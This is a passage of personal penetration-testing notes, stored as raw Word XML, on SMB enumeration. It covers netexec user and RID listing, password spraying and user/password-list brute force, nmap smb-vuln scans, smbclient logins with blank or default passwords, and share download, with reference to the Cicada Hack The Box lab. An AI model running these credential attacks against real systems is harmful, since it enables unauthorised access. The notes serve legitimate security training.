      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p ''</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is that the rid-brute gives more information than just users (ex. groups), and ALSO that users includes "descriptions" for each user, which in the Cicada HTB actually gave us a password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74" name="image89.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image89.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId373"/>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34C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7bdzst5ykcyt" w:id="163"/>
      <w:bookmarkEnd w:id="163"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bruteforce enumeration with a username list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p "random password" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt is a text file where each username is in it's own line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the password with your desired password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001350">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="524" name="image506.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image506.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId374"/>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1351">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From this output, michael.wrightson (on the bottom) is the only one that the password worked for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001352">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use his username and password to enumerate the shares using the "--shares" flag just like before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001353">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also rerun the "--rid-brute" flag with the username and password since it might give us new users now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001354">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001355">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8huge4ebglnl" w:id="164"/>
      <w:bookmarkEnd w:id="164"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bruteforce enumeration with a username list and password list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001356">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001357">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is only theoretical. I know this works on crackmapexec though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001358">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should try all combinations of users and passwords, like all the usernames will be combined with all the passwords, not just like a one-to-one relationship. At least crackmapexec does that</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001359">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mv19srmv7oh7" w:id="165"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate SMB using nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ce0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap {ip} --script=smb-vuln*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L [MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -L stands for "list", as in list the share names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TRY EMPTY PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001360">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It often requires a password and just list the names, while the nmap scan with the script usually tells us about the permissions and WAY more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001361">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L [MACHINE_IP] -U Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001362">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try a blank password or another password like "Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001363">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L [MACHINE_IP] -U Admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001364">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try a blank password or another password like "Admin"</w:t>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t xml:space="preserve">How to inspect a specific SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001368">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //MACHINE_IP/SHARE_NAME -N</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001369">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-N" stands for no password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ce0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //TARGET_IP/SHARE_NAME -U username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this if you want to access as a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do this, it will ask for a password LATER, so no need to specify password here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Often, when you try to access the anonymous share for example, it will ask for a password, and the password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From there, do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls (or dir) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or any other commands to look around the share</w:t>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t xml:space="preserve">How to download a specific file while inside SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001371">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">get [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001372">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it will download the file to the current working directory of your terminal</w:t>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t xml:space="preserve">How to recursively download a specific SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbget -R smb://MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001376">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
